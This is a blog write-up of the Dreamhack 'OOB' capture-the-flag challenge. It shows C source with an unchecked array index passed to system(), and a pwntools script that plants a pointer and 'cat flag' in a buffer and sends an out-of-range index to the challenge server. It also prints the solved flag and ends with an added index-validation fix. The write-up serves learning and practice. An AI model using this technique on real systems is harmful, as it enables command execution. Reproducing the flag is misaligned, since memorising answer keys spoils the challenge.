Lonely Nova's Workshop

dreamhack - OOB write up

Nova_ 2023. 4. 25. 18:23

- source code

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>

char name[16];

char *command[10] = { "cat",
    "ls",
    "id",
    "ps",
    "file ./oob" };
void alarm_handler()
{
    puts("TIME OUT");
    exit(-1);
}

void initialize()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main()
{
    int idx;

    initialize();

    printf("Admin name: ");
    read(0, name, sizeof(name));
    printf("What do you want?: ");

    scanf("%d", &idx);

    /* idx is never range-checked, so command[idx] can read outside the array */
    system(command[idx]);

    return 0;
}

 

- exploit

DH{2524e20ddeee45f11c8eb91804d57296}

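from pwn import *

p = remote("23.81.42.210", 21889)

print(p.recvuntil(b"Admin name: "))
# 4-byte pointer, followed by the command string it points to (4 bytes further on)
payload = p32(0x804a0ac+4) + b"cat flag"
print(payload)
p.send(payload)
print(p.recvuntil(b"What do you want?: "))
# 19 is outside command[10], whose valid indices are 0-9
p.sendline(b"19")
print(19)

print(p.recv())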

- What I learned

At the assembly level, the system() function takes as its argument the address where a string is located.
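Because system() runs whatever string its pointer argument refers to, the index into `command` has to be validated before the lookup. The following is an added example, not part of the original write-up or the challenge's code: `select_command` is a hypothetical helper that rejects non-numeric input, any index outside the table, and the table's uninitialised (NULL) slots.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Same table as the challenge: 10 slots, only 5 initialised (the rest are NULL). */
static const char *const command[10] = { "cat", "ls", "id", "ps", "file ./oob" };

#define COMMAND_SLOTS (sizeof(command) / sizeof(command[0]))

/*
 * Hypothetical helper (not in the original source): parse the user's choice
 * and return the matching table entry, or NULL when the input is not a valid
 * index into an initialised slot.
 */
const char *select_command(const char *input)
{
    char *end;
    long idx;

    errno = 0;
    idx = strtol(input, &end, 10);
    if (end == input || errno == ERANGE)
        return NULL;                      /* not a number, or out of long range */
    while (*end == ' ' || *end == '\t' || *end == '\r' || *end == '\n')
        end++;
    if (*end != '\0')
        return NULL;                      /* trailing garbage after the number */
    if (idx < 0 || (unsigned long)idx >= COMMAND_SLOTS)
        return NULL;                      /* outside the array: the OOB case */
    return command[idx];                  /* NULL for the unused slots 5-9 */
}

int main(void)
{
    char line[32];

    printf("What do you want?: ");
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    const char *cmd = select_command(line);
    if (cmd == NULL) {
        puts("invalid choice");
        return 1;
    }
    return system(cmd) == 0 ? 0 : 1;
}
```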
